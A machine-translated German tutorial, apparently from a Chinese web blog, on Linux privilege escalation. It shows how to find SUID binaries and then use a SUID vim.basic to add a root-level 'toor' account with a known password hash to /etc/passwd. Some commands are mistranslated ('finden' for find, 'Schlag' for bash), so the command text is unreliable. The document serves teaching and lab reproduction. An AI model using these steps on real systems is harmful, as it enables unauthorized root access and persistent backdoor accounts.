Linux verwendet die suid vim.basic-Datei, um eine Rechteausweitung zu erreichen

Auf Kali reproduzieren

Legen Sie zunächst die Suid-Berechtigungen für die erforderliche vim.basic-Datei fest.

chmod u+s /usr/bin/vim.basic

Zuerst adduser test1, ein Benutzer mit normalen Berechtigungen

Jetzt ist eine geeignete Umgebung für die Rechteausweitung

Sie können Dateien mit Suid-Berechtigungen mit dem folgenden Befehl finden

finden / -user root -perm -4000 -print 2>/dev/null
finden / -perm -u=s -type f 2>/dev/null
finden / -user root -perm -4000 -exec ls -ldb {} \;

Die Dateien, die zur Rechteausweitung verwendet werden können, sind

• nmap
• vim
• finden
• Schlag
• mehr
• weniger
• Nanometer
• cp

Die Idee, vim zum Erhöhen von Berechtigungen zu verwenden, besteht darin, die Datei etc/passwd zu ändern und einen Benutzer mit Root-Berechtigungen für sich selbst hinzuzufügen

Das Benutzerformat der Passwd-Datei lautet: Benutzername:Passwort:UID:GID:Kommentar:Home-Verzeichnis:Benutzer-Shell

Hier sehen Sie das Format des Root-Benutzers

root:x:0:0:root:/root:/bin/bash

(Der Passwortteil ist x, da das echte Passwort in der Datei /etc/shadow gespeichert ist)

Generieren Sie ein Passwort: Verwenden Sie openssl passwd -1 –salt asd 123 (hier ist -1 (Zahl 1) nicht L)

Schreiben Sie es direkt in die Passwd-Datei.

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

Sie können es mit vim /etc/passwd ändern, aber beim Speichern wird E212 angezeigt und es kann nicht gespeichert werden, was uns mit der Meldung anzeigt, dass wir keine Berechtigung zum Ändern haben

Zu diesem Zeitpunkt sollten Sie die zuvor gefundene Datei vim.basic verwenden, um es auszuführen. Dieses Programm verfügt über SUID-Berechtigungen. Definitiv editierbar

vim.basic /etc/passwd

Hiermit können Sie die Datei öffnen, anschließend ändern und erfolgreich speichern.

Sie können sehen, dass es hinzugefügt wurde. Wechseln Sie zu su toor, Kennwort 123, und überprüfen Sie dann die Berechtigungen mit der ID

Root-Berechtigungen

chmod u+s /usr/bin/vim.basic

Das Obige ist der vollständige Inhalt dieses Artikels. Ich hoffe, er wird für jedermanns Studium hilfreich sein. Ich hoffe auch, dass jeder 123WORDPRESS.COM unterstützen wird.